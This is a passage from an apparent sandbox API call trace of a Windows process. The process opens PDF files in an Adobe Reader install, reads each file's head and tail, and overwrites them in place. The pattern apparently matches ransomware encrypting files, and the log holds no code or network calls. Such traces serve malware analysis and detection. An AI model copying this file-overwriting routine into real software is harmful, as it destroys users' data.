dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0064.260] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.260] CloseHandle (hObject=0x1dc) returned 1 [0064.282] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rus\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0064.283] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.283] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1e071 [0064.283] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.283] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.283] ReleaseMutex (hMutex=0x168) returned 1 [0064.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0064.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7320c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0064.283] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.285] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1d071 [0064.285] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.287] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1d071 [0064.287] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.287] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0064.287] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.287] CloseHandle (hObject=0x1dc) returned 1 [0064.292] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sve\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0064.294] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.294] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x12696 [0064.294] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.294] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.295] ReleaseMutex (hMutex=0x168) returned 1 [0064.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0064.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0064.295] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.300] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x11696 [0064.300] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.301] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x11696 [0064.302] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.302] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0064.302] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.302] CloseHandle (hObject=0x1dc) returned 1 [0064.519] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\faces.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0064.522] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.522] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x892d [0064.522] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.522] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.572] ReleaseMutex (hMutex=0x168) returned 1 [0064.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0064.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Faces.pdf", lpUsedDefaultChar=0x0) returned 9 [0064.573] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.583] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x792d [0064.583] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.584] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x792d [0064.584] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea7988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.584] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0064.584] WriteFile (in: hFile=0x1dc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.584] CloseHandle (hObject=0x1dc) returned 1 [0064.588] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0064.588] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.588] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x217ce [0064.589] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.589] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.589] ReleaseMutex (hMutex=0x168) returned 1 [0064.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0064.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88d34, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0064.589] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0064.643] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x207ce [0064.644] ReadFile (in: hFile=0x1dc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.645] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x207ce [0064.645] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.645] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0064.645] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0064.646] CloseHandle (hObject=0x1dc) returned 1 [0064.658] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0064.659] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.659] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x5274b [0064.659] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.659] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.659] ReleaseMutex (hMutex=0x168) returned 1 [0064.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0064.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f735ec, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0064.659] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0064.669] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5174b [0064.669] ReadFile (in: hFile=0x1dc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.683] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5174b [0064.684] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.684] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0064.685] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0064.685] CloseHandle (hObject=0x1dc) returned 1 [0064.722] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\deu\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0064.951] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.962] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x178c0 [0064.962] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.962] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.963] ReleaseMutex (hMutex=0x168) returned 1 [0064.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0064.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88bcc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0064.974] ReadFile (in: hFile=0x1bc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.976] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x168c0 [0064.976] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.977] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x168c0 [0064.978] WriteFile (in: hFile=0x1bc, lpBuffer=0x2668a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668a68*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.978] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0064.978] WriteFile (in: hFile=0x1bc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.978] CloseHandle (hObject=0x1bc) returned 1 [0064.985] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\faces.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0064.986] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.986] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x892d [0064.986] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.986] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.986] ReleaseMutex (hMutex=0x168) returned 1 [0064.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0064.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Faces.pdf", lpUsedDefaultChar=0x0) returned 9 [0064.986] ReadFile (in: hFile=0x1bc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.990] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x792d [0064.991] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.991] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x792d [0064.991] WriteFile (in: hFile=0x1bc, lpBuffer=0x2668a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668a68*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.991] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0064.991] WriteFile (in: hFile=0x1bc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.991] CloseHandle (hObject=0x1bc) returned 1 [0064.996] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0064.996] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.997] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x21a02 [0064.997] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.997] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.997] ReleaseMutex (hMutex=0x168) returned 1 [0064.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0064.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0064.997] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x345f278*=0x8000, 